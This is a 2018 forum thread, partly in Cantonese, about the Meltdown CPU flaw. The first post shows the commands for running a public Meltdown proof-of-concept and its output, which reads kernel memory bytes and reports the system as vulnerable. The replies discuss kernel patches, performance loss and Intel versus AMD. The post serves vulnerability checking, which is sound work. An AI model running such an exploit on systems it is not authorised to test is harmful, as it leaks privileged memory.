作者: samiux 時間: 2018-1-8 11:35 標題: Meltdown Exploit PoC
paboldin just release the Meltdown Exploit Poc. To check Meltdown on your Linux system :
git clone https://github.com/paboldin/meltdown-exploit
cd meltdown-exploit
make
./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo sed -n -E s/^(f[0-9a-f]+) .* linux_proc_banner$/\1/p /proc/kallsyms
[sudo] password for samiux:
+ linux_proc_banner=ffffffffbca000a0
+ set +x
cached = 25, uncached = 254, threshold 79
read ffffffffbca000a0 = 25 % (score=239/1000)
read ffffffffbca000a1 = 73 s (score=402/1000)
read ffffffffbca000a2 = 20 (score=47/1000)
read ffffffffbca000a3 = 76 v (score=321/1000)
read ffffffffbca000a4 = 65 e (score=116/1000)
read ffffffffbca000a5 = 72 r (score=309/1000)
read ffffffffbca000a6 = 73 s (score=225/1000)
read ffffffffbca000a7 = 69 i (score=239/1000)
read ffffffffbca000a8 = 6f o (score=223/1000)
read ffffffffbca000a9 = 6e n (score=273/1000)
read ffffffffbca000aa = 20 (score=87/1000)
read ffffffffbca000ab = 25 % (score=329/1000)
read ffffffffbca000ac = 73 s (score=332/1000)
read ffffffffbca000ad = 20 (score=37/1000)
read ffffffffbca000ae = 28 ( (score=170/1000)
read ffffffffbca000af = 62 b (score=165/1000)
VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 61
model name : Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz
stepping : 4
microcode : 0x16
cpu MHz : 2899.951
cache size : 4096 KB
physical id : 0
My Intel i7-5500U on latest Ubuntu Linux 16.04.3 HWE is vulnerable.
Source : https://github.com/paboldin/meltdown-exploit
Samiux
作者: gdh 時間: 2018-1-8 14:29
Simply update linux kernel to version 4.14.11

作者: KinChungE 時間: 2018-1-8 15:30
[attach]2034777[/attach]
用AMD是明智的
作者: chue 時間: 2018-1-8 19:50
INTEL 發稿企圖拖人落水,結果失敗
作者: Jaba 時間: 2018-1-8 22:10
租出面d VPS, 當Host又patch左新kernel, client又patch 新kernel, performance impact係咪就accumulate 左?
作者: KinChungE 時間: 2018-1-9 00:34
租出面d VPS, 當Host又patch左新kernel, client又patch 新kernel, performance impact係咪就accumulate 左? ...
Jaba 發表於 2018-1-8 22:10
bios patch, host os patch, guest os patch, guest browser patch
之後剩翻一半都冇
作者: chue 時間: 2018-1-9 11:00
本帖最後由 chue 於 2018-1-9 11:05 編輯
要先睇係用咩 CPU 而定,INTEL 其實唔係咁 FIT SERVER 用,不過如果係租香港公司就比較多 INTEL,因為香港人既人性弱點既關係,你睇返過去D POST 有幾多人係死都 INTEL,或幾多人死都 WIN10,幾多人用 OFFICE 死都要比一大筆買 M$ 果套就知,仲有更多例子舉之不盡,但只係簡單 3個例子已足夠反映港人心態
簡單黎講,造成呢種心態大多數都係從小養成既,即係個教育制度衍生出黎既各種問題既其中一種
作者: KinChungE 時間: 2018-1-9 15:56
Office真係冇計
你唔用, 你D客都用, 除非你唔同人做生意
如果指定要Microsoft Office, 得Windows同macOS揀, 大部份公司當然揀Windows, 純綷因為平
至於CPU, 個人認為係廠機好少AMD機揀
作者: chue 時間: 2018-1-9 18:39
但係 MS OFFICE 唔同版本又唔相容呢下真係玩死晒各行各業
作者: chue 時間: 2018-1-9 18:42
啱啱我開下部 PC 仔,用 INTEL U,入去 OPENSUSE 果然好多野要更新,效能又好似真係差左
作者: samiux 時間: 2018-1-13 09:01
Please note that the Ubuntu kernel update on Jan 10, 2018 HKT is for Meltdown vulnerability only. The kernel update for the Spectre vulnerability will be on Jan 16, 2018 HKT.
Read more ....

